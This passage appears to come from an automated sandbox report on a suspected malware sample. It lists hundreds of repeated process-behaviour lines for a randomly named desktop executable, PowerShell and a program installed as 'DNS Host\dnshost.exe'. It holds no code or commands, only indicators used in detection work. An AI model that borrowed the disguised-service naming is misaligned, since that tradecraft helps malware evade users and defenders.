Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
